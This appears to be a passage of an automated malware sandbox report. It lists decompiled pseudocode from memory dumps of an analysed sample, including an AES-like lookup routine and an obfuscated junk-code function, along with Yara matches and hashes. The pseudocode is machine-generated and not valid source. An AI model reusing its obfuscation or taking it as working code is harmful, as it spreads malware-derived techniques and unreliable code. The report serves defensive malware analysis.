                                                                                                                                                    				asm("ror ebx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_t358 = _a8;
                                                                                                                                                    				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                                                                                                                                    				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                                                                                                                    				asm("ror ecx, 0x8");
                                                                                                                                                    				asm("rol edi, 0x8");
                                                                                                                                                    				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                                                                                                                                    				return _t274;
                                                                                                                                                    			}




















                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                                                                                                    • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                    • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2a61477ce728e541a100c0fac9215fcef5cc3b96bf1a96e5004b2b31d9527221
                                                                                                                                                    • Instruction ID: e8c84bb2d4f5f8afefa0f1fd419ce237b4136d90c61af4907126974827be1750
                                                                                                                                                    • Opcode Fuzzy Hash: 2a61477ce728e541a100c0fac9215fcef5cc3b96bf1a96e5004b2b31d9527221
                                                                                                                                                    • Instruction Fuzzy Hash: E5E1DE342546518FC728CF19C1A06B2B7E1AF65351F24C85FE8E68F392D339E856EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bc85987f6887e82a7908e5e54a86df7c114b0b243242749df162e06430590533
                                                                                                                                                    • Instruction ID: 50b1353f0be5f70ad2a704ee55f12d57d9793f0c389332ae988cc042f8a3ada1
                                                                                                                                                    • Opcode Fuzzy Hash: bc85987f6887e82a7908e5e54a86df7c114b0b243242749df162e06430590533
                                                                                                                                                    • Instruction Fuzzy Hash: 61C15A70909655EFDB24EF24C494BBBBBF8EF41300F14481DE9868B781C779A941EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0119e86ab92e8a4797ad50d2f598ebde1a3b8f2b1231c84c58a8c3bbfdfbea03
                                                                                                                                                    • Instruction ID: 82e012f3e0bc757e0d29331e3ea0fc31789a2bad2340730963359287057ea4dc
                                                                                                                                                    • Opcode Fuzzy Hash: 0119e86ab92e8a4797ad50d2f598ebde1a3b8f2b1231c84c58a8c3bbfdfbea03
                                                                                                                                                    • Instruction Fuzzy Hash: 87B19D31A042199FDB34CF68CC84FAAB3F8EF49710F05459AE84AEB291D7749D85CB21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f7b2cd4961c626cc384c1555137b6bfe10b177bc42df195d4809a582bb090ff
                                                                                                                                                    • Instruction ID: 3dfe266ced3e591fa4d8551a04a837873cfcf60a7d0223b42ab9927f2afd45b3
                                                                                                                                                    • Opcode Fuzzy Hash: 8f7b2cd4961c626cc384c1555137b6bfe10b177bc42df195d4809a582bb090ff
                                                                                                                                                    • Instruction Fuzzy Hash: 97C1CF74A00619CFCB24CF99C580AACF7B1FF89324F298269D865AB395C734AD42CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E0041CB21(signed char __eax, signed int __ebx, signed int __edi, signed int __esi) {
                                                                                                                                                    				char _v3;
                                                                                                                                                    				void* _v5;
                                                                                                                                                    				char _v1553020165;
                                                                                                                                                    				signed int _t33;
                                                                                                                                                    				signed int _t40;
                                                                                                                                                    				signed char _t41;
                                                                                                                                                    				signed char _t43;
                                                                                                                                                    				signed int _t44;
                                                                                                                                                    				signed int _t46;
                                                                                                                                                    				signed int _t47;
                                                                                                                                                    				char _t59;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				signed int _t71;
                                                                                                                                                    				signed int _t72;
                                                                                                                                                    				signed int _t75;
                                                                                                                                                    				signed int _t82;
                                                                                                                                                    				signed int _t83;
                                                                                                                                                    				signed int _t85;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				signed int _t89;
                                                                                                                                                    
                                                                                                                                                    				_t71 = __esi;
                                                                                                                                                    				_t69 = __edi;
                                                                                                                                                    				_t33 = __ebx;
                                                                                                                                                    				_t21 = __eax;
                                                                                                                                                    				goto L1;
                                                                                                                                                    				do {
                                                                                                                                                    					do {
                                                                                                                                                    						do {
                                                                                                                                                    							do {
                                                                                                                                                    								do {
                                                                                                                                                    									do {
                                                                                                                                                    										do {
                                                                                                                                                    											do {
                                                                                                                                                    												do {
                                                                                                                                                    													do {
                                                                                                                                                    														L1:
                                                                                                                                                    														asm("adc edx, [0x5e421cd5]");
                                                                                                                                                    														_t89 = _t89 ^  *0x334c66df;
                                                                                                                                                    														_t75 =  *0xaaaba36a * 0xbaf0;
                                                                                                                                                    														_t33 = _t33 ^ 0x000000e2;
                                                                                                                                                    														 *0xc813dcc0 =  *0xc813dcc0 | _t89;
                                                                                                                                                    														_t40 =  *0x292c1c60 * 0x98;
                                                                                                                                                    														asm("adc ebp, 0x8b319bf");
                                                                                                                                                    														 *0x35b436d6 =  *0x35b436d6 - _t71;
                                                                                                                                                    														asm("scasb");
                                                                                                                                                    														_t69 = _t69 + 0xa842938c;
                                                                                                                                                    														_t21 = 0xa0;
                                                                                                                                                    														asm("adc esp, [0x2757028f]");
                                                                                                                                                    														 *0x32229493 =  *0x32229493 + _t71;
                                                                                                                                                    														 *0x1943159a =  *0x1943159a << 0x14;
                                                                                                                                                    													} while ( *0x1943159a >= 0);
                                                                                                                                                    													_push( *0x8a019379);
                                                                                                                                                    													 *0x338e4d09 =  *0x338e4d09 - _t75;
                                                                                                                                                    													_t41 = _t40 +  *0xc767fb2f;
                                                                                                                                                    													_t71 = _t71 &  *0x79f0b96d;
                                                                                                                                                    													_pop(_t33);
                                                                                                                                                    													_t69 = 0x6c15bc25;
                                                                                                                                                    												} while (_t71 !=  *0x3127e0eb);
                                                                                                                                                    												_t33 = _t33 ^  *0x48c4ae7b;
                                                                                                                                                    												 *0xa0c15f1e =  *0xa0c15f1e << 0x44;
                                                                                                                                                    												asm("adc [0xda1631d7], bl");
                                                                                                                                                    												asm("sbb al, [0xd0696c80]");
                                                                                                                                                    												asm("sbb [0x2b367c28], ah");
                                                                                                                                                    												asm("sbb edi, [0x935d9f6f]");
                                                                                                                                                    												asm("adc edi, [0x98c171f0]");
                                                                                                                                                    												_push(_t41);
                                                                                                                                                    											} while ((_t75 | 0x4c43d609) <= 0);
                                                                                                                                                    											_t72 = _t71 -  *0xd570db33;
                                                                                                                                                    											 *0x38bd6906 = 0x6c15bc25;
                                                                                                                                                    											asm("adc [0x9422b163], dh");
                                                                                                                                                    											_push( &_v3);
                                                                                                                                                    											_push(_t89);
                                                                                                                                                    											 *0xf66c4e84 =  *0xf66c4e84 << 0x5e;
                                                                                                                                                    											asm("stosb");
                                                                                                                                                    											asm("rol byte [0x24928e08], 0xcf");
                                                                                                                                                    											_t43 = _t41 &  *0x6db748e7 & 0x00000012;
                                                                                                                                                    											asm("adc esp, [0x32f38ef7]");
                                                                                                                                                    											 *0x11e6b59a =  &_v1553020165;
                                                                                                                                                    											asm("scasd");
                                                                                                                                                    											_push( *0x6ff254c4);
                                                                                                                                                    											 *0xbaa7560a =  *0xbaa7560a ^ 0x000000e5;
                                                                                                                                                    											_t82 =  *0x11e6b59a |  *0x18b35787;
                                                                                                                                                    											asm("adc [0x295d6433], ebp");
                                                                                                                                                    											_t33 = _t82;
                                                                                                                                                    											 *0x6346c282 = _t43;
                                                                                                                                                    											asm("movsw");
                                                                                                                                                    											 *0x37ed6722 =  *0x37ed6722 >> 0xdf;
                                                                                                                                                    											_t4 = _t89;
                                                                                                                                                    											_t89 =  *0x128341fd;
                                                                                                                                                    											 *0x128341fd = _t4;
                                                                                                                                                    											asm("sbb [0xc8ff196d], eax");
                                                                                                                                                    											asm("cmpsb");
                                                                                                                                                    											asm("adc edi, [0x1e7aa6be]");
                                                                                                                                                    											 *0x85666b17 =  *0x85666b17 - _t72;
                                                                                                                                                    											_push(_t43);
                                                                                                                                                    											_t71 = _t72 &  *0xcf3a8426;
                                                                                                                                                    											_t21 = 0xffffffffdbe1ea9f ^  *0x671e3485;
                                                                                                                                                    											asm("adc esi, [0x6e08e1d8]");
                                                                                                                                                    											_t44 =  *0x15cb48c6;
                                                                                                                                                    											_t59 =  *0x8876bbc9 +  *0xd845a0f8;
                                                                                                                                                    											 *0x9f02529b = _t44;
                                                                                                                                                    											_t83 =  *0x33f48621;
                                                                                                                                                    											 *0x33f48621 = _t82;
                                                                                                                                                    											 *0x5d577fd0 = _t59;
                                                                                                                                                    											 *0x2c4a64a0 =  *0x2c4a64a0 >> 0x9c;
                                                                                                                                                    											_push(_t33);
                                                                                                                                                    										} while (_t44 !=  *0x7e11aa01);
                                                                                                                                                    										 *0xcc866317 = _t89;
                                                                                                                                                    										asm("sbb ebx, [0xd455546f]");
                                                                                                                                                    										_push(0x6a4f48c8);
                                                                                                                                                    										 *0x2ea3688c = 0x6c15bc25;
                                                                                                                                                    										asm("sbb [0x2eb27dfe], eax");
                                                                                                                                                    										 *0xa1e96620 =  *0xa1e96620 ^ _t44;
                                                                                                                                                    										 *0x47a13614 =  *0x47a13614 - _t21;
                                                                                                                                                    										_t71 = _t71 - 1;
                                                                                                                                                    										 *0x514eb14 = _t44;
                                                                                                                                                    										asm("adc edx, [0x4c191a9b]");
                                                                                                                                                    										_t85 = _t83 -  *0xe608697a &  *0xe6a040ba;
                                                                                                                                                    										 *0x5716bcc9 =  *0x5716bcc9 >> 0x14;
                                                                                                                                                    										_t69 = _t85;
                                                                                                                                                    										_t33 =  *0x33af7c6b * 0xd87a;
                                                                                                                                                    										asm("adc edi, [0xafe6edeb]");
                                                                                                                                                    									} while (_t33 != 0);
                                                                                                                                                    									asm("adc edx, [0xeae58dea]");
                                                                                                                                                    									asm("cmpsw");
                                                                                                                                                    									 *0xaf7857dd =  *0xaf7857dd - _t33;
                                                                                                                                                    									 *0x11999861 =  *0x11999861 << 0x28;
                                                                                                                                                    									asm("sbb edi, [0x816adede]");
                                                                                                                                                    									_t60 = _t59 - 1;
                                                                                                                                                    									_t33 = _t33 ^  *0x54189ad4;
                                                                                                                                                    									asm("sbb dh, [0x39c869f2]");
                                                                                                                                                    									 *0x8dfb0486 =  *0x8dfb0486 | _t44;
                                                                                                                                                    									_t21 = _t21 + 0x000000a8 & 0x000000d7;
                                                                                                                                                    								} while ( *0x9c1574f5 > 0x7bb794f0);
                                                                                                                                                    								_push( *0x7e364977);
                                                                                                                                                    								_t21 = _t21 +  *0x1999ac07;
                                                                                                                                                    								_push(_t89);
                                                                                                                                                    								asm("adc [0x2f223ce3], dl");
                                                                                                                                                    								_t69 = 0x6c15bc25 |  *0x10aa7261;
                                                                                                                                                    								 *0x2b2bf9cf =  *0x2b2bf9cf << 0xf3;
                                                                                                                                                    								asm("sbb ebx, [0xb5a65fdf]");
                                                                                                                                                    								asm("rol dword [0x60a99081], 0x4f");
                                                                                                                                                    								_push(0x8a93de3f);
                                                                                                                                                    								_t89 = _t89 - 0x90adaa9f;
                                                                                                                                                    								 *0x89396117 = _t44;
                                                                                                                                                    								_push(0xb8e50596);
                                                                                                                                                    								asm("scasb");
                                                                                                                                                    								_t71 = _t71 ^  *0x50c7d592;
                                                                                                                                                    								asm("adc [0x39f55b94], ebp");
                                                                                                                                                    								_push(0x7bb794f0);
                                                                                                                                                    								_t62 =  *0x1b55b233;
                                                                                                                                                    								 *0x1b55b233 = _t60 - 1;
                                                                                                                                                    								 *0xdc99769c =  *0xdc99769c + _t33;
                                                                                                                                                    								asm("ror dword [0xe93fb20d], 0xd5");
                                                                                                                                                    								 *0x66590412 =  *0x66590412 + _t33;
                                                                                                                                                    								 *0x7b9742b6 =  *0x7b9742b6 >> 0x55;
                                                                                                                                                    								_t46 = (_t44 &  *0xb7c25eba) + 1;
                                                                                                                                                    								_t86 =  *0x2bc6e4f3;
                                                                                                                                                    								 *0x2bc6e4f3 = _t85;
                                                                                                                                                    								_t33 = _t33 -  *0x9f16768c;
                                                                                                                                                    								 *0x892763b4 =  *0x892763b4 >> 0x2f;
                                                                                                                                                    								 *0x8da005d1 =  *0x8da005d1 - _t69;
                                                                                                                                                    								 *0x172d0c80 =  *0x172d0c80 ^ 0x000000a0;
                                                                                                                                                    								asm("stosd");
                                                                                                                                                    								asm("adc ebp, 0x8d59d09");
                                                                                                                                                    								 *0xa3173526 =  *0xa3173526 - _t62;
                                                                                                                                                    								asm("sbb cl, [0xb7721c20]");
                                                                                                                                                    								 *0xbe7f3be2 =  *0xbe7f3be2 | _t46;
                                                                                                                                                    							} while ( *0xbe7f3be2 >= 0);
                                                                                                                                                    							_t47 = _t46 | 0x6dd98d79;
                                                                                                                                                    							asm("lodsd");
                                                                                                                                                    							_t69 = _t69 - 1;
                                                                                                                                                    							_pop( *0x6f65a6be);
                                                                                                                                                    							 *0x7a1da53f = _t86;
                                                                                                                                                    							_push(_t62);
                                                                                                                                                    							asm("rcl byte [0x5e19b918], 0x73");
                                                                                                                                                    							_t21 =  *0x9819da60 * 0xe445;
                                                                                                                                                    							_push( *0xbaeae5f5);
                                                                                                                                                    							_push(_t21);
                                                                                                                                                    							 *0x777b20a3 =  *0x777b20a3 >> 0x31;
                                                                                                                                                    						} while (_t21 >= 0);
                                                                                                                                                    						_t89 =  *0xea77197d * 0x6409;
                                                                                                                                                    						 *0x61337180 =  *0x61337180 ^ 0x000000e5;
                                                                                                                                                    						_t33 =  *0xe398bf3f &  *0xb34d5225;
                                                                                                                                                    						 *0xa259efcc = _t86;
                                                                                                                                                    						asm("sbb bh, 0xe0");
                                                                                                                                                    						_pop(_t66);
                                                                                                                                                    						asm("sbb [0x479af5f6], cl");
                                                                                                                                                    						 *0xa56aaf28 =  *0xa56aaf28 + _t33;
                                                                                                                                                    						_push(_t47);
                                                                                                                                                    						 *0x2e70a116 =  *0x2e70a116 & _t33;
                                                                                                                                                    						_t67 = _t66 + 1;
                                                                                                                                                    						_t21 = (_t21 &  *0x706eee2c) - 0xffffffffffffffbd;
                                                                                                                                                    						asm("sbb eax, 0xc781f7c0");
                                                                                                                                                    						asm("rcl byte [0x65cba7d2], 0xdc");
                                                                                                                                                    					} while (( *0xf7fb6a1d & _t71) >= 0);
                                                                                                                                                    					 *0xf5d5a79 =  *0xf5d5a79 << 0x3b;
                                                                                                                                                    					asm("adc ebp, 0x5e224923");
                                                                                                                                                    					 *0xe27fa213 = _t67;
                                                                                                                                                    					asm("stosd");
                                                                                                                                                    				} while (_t47 >=  *0x82bb53b3);
                                                                                                                                                    				asm("sbb esp, [0xe28d90d3]");
                                                                                                                                                    				 *0xc3b26db6 =  *0xc3b26db6 - _t47 +  *0x31a169f7;
                                                                                                                                                    				asm("cmpsw");
                                                                                                                                                    				asm("sbb eax, [0xb271d1fc]");
                                                                                                                                                    				asm("adc [0xbd58fa88], dh");
                                                                                                                                                    				asm("ror byte [0xc16f6e8a], 0xe2");
                                                                                                                                                    				asm("adc esp, [0xb03dffeb]");
                                                                                                                                                    				asm("sbb edi, [0xcc9f55bc]");
                                                                                                                                                    				return  *0xdfaf9028;
                                                                                                                                                    			}


























                                                                                                                                                    0x0041cd2c
                                                                                                                                                    0x0041cd31
                                                                                                                                                    0x0041cd37
                                                                                                                                                    0x0041cd3d
                                                                                                                                                    0x0041cd43
                                                                                                                                                    0x0041cd49
                                                                                                                                                    0x0041cd4a
                                                                                                                                                    0x0041cd50
                                                                                                                                                    0x0041cd56
                                                                                                                                                    0x0041cd5d
                                                                                                                                                    0x0041cd64
                                                                                                                                                    0x0041cd6b
                                                                                                                                                    0x0041cd75
                                                                                                                                                    0x0041cd75
                                                                                                                                                    0x0041cd88
                                                                                                                                                    0x0041cd8e
                                                                                                                                                    0x0041cd90
                                                                                                                                                    0x0041cd96
                                                                                                                                                    0x0041cd9d
                                                                                                                                                    0x0041cda3
                                                                                                                                                    0x0041cda4
                                                                                                                                                    0x0041cdaa
                                                                                                                                                    0x0041cdb3
                                                                                                                                                    0x0041cdbf
                                                                                                                                                    0x0041cdc1
                                                                                                                                                    0x0041cdcd
                                                                                                                                                    0x0041cdd3
                                                                                                                                                    0x0041cdd9
                                                                                                                                                    0x0041cdda
                                                                                                                                                    0x0041cde0
                                                                                                                                                    0x0041cde6
                                                                                                                                                    0x0041cded
                                                                                                                                                    0x0041cdf4
                                                                                                                                                    0x0041cdfb
                                                                                                                                                    0x0041ce00
                                                                                                                                                    0x0041ce06
                                                                                                                                                    0x0041ce0c
                                                                                                                                                    0x0041ce11
                                                                                                                                                    0x0041ce12
                                                                                                                                                    0x0041ce18
                                                                                                                                                    0x0041ce21
                                                                                                                                                    0x0041ce22
                                                                                                                                                    0x0041ce22
                                                                                                                                                    0x0041ce2e
                                                                                                                                                    0x0041ce34
                                                                                                                                                    0x0041ce3b
                                                                                                                                                    0x0041ce41
                                                                                                                                                    0x0041ce48
                                                                                                                                                    0x0041ce49
                                                                                                                                                    0x0041ce49
                                                                                                                                                    0x0041ce55
                                                                                                                                                    0x0041ce5b
                                                                                                                                                    0x0041ce62
                                                                                                                                                    0x0041ce68
                                                                                                                                                    0x0041ce74
                                                                                                                                                    0x0041ce75
                                                                                                                                                    0x0041ce7b
                                                                                                                                                    0x0041ce81
                                                                                                                                                    0x0041ce87
                                                                                                                                                    0x0041ce87
                                                                                                                                                    0x0041ce93
                                                                                                                                                    0x0041ce99
                                                                                                                                                    0x0041ce9a
                                                                                                                                                    0x0041ce9b
                                                                                                                                                    0x0041cea1
                                                                                                                                                    0x0041cea7
                                                                                                                                                    0x0041ceb1
                                                                                                                                                    0x0041ceb8
                                                                                                                                                    0x0041cec2
                                                                                                                                                    0x0041cec8
                                                                                                                                                    0x0041cec9
                                                                                                                                                    0x0041ced0
                                                                                                                                                    0x0041cedc
                                                                                                                                                    0x0041cee6
                                                                                                                                                    0x0041cef2
                                                                                                                                                    0x0041cf04
                                                                                                                                                    0x0041cf0d
                                                                                                                                                    0x0041cf10
                                                                                                                                                    0x0041cf14
                                                                                                                                                    0x0041cf1a
                                                                                                                                                    0x0041cf20
                                                                                                                                                    0x0041cf21
                                                                                                                                                    0x0041cf27
                                                                                                                                                    0x0041cf28
                                                                                                                                                    0x0041cf2f
                                                                                                                                                    0x0041cf3a
                                                                                                                                                    0x0041cf41
                                                                                                                                                    0x0041cf4d
                                                                                                                                                    0x0041cf54
                                                                                                                                                    0x0041cf5b
                                                                                                                                                    0x0041cf61
                                                                                                                                                    0x0041cf68
                                                                                                                                                    0x0041cf7a
                                                                                                                                                    0x0041cf8c
                                                                                                                                                    0x0041cf98
                                                                                                                                                    0x0041cf9a
                                                                                                                                                    0x0041cfa6
                                                                                                                                                    0x0041cfac
                                                                                                                                                    0x0041cfb3
                                                                                                                                                    0x0041cfcc
                                                                                                                                                    0x0041cfd2

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: be5d434b59c48eae83d563da1480071b6f177090f230a92dca554296e7844351
                                                                                                                                                    • Instruction ID: 708ca1bdf7fb0c19059a5a57b2e39ec391b4a326847679c1c6eb9f47b8340e75
                                                                                                                                                    • Opcode Fuzzy Hash: be5d434b59c48eae83d563da1480071b6f177090f230a92dca554296e7844351
                                                                                                                                                    • Instruction Fuzzy Hash: ADB1657291A3C4CFDB02DF38DD86A413FB2F746324708428ED5A167682D739216ADF89
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                                                                    • Instruction ID: 90a14a60020add17b0a895d0613134e90031ef421c3247ddbc87a8c548f3dc7a
                                                                                                                                                    • Opcode Fuzzy Hash: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                                                                    • Instruction Fuzzy Hash: 1F916D72550B06CFD725CF28C585666BBE4FF05368B24CA6EE4E6DB2A1C338E951DB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d488c24800659c7289783f70480efcc5527e67695d92a2c86819492e96a8884
                                                                                                                                                    • Instruction ID: c8cd5fa488ff42567a3a4f6addf8e76b7462c92518d3f1a2bcaa2a247ae10f32
                                                                                                                                                    • Opcode Fuzzy Hash: 2d488c24800659c7289783f70480efcc5527e67695d92a2c86819492e96a8884
                                                                                                                                                    • Instruction Fuzzy Hash: 798122729092599FDF25CF58C884BBEBBB9EF80310F14C469E82A9B296D334D911CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
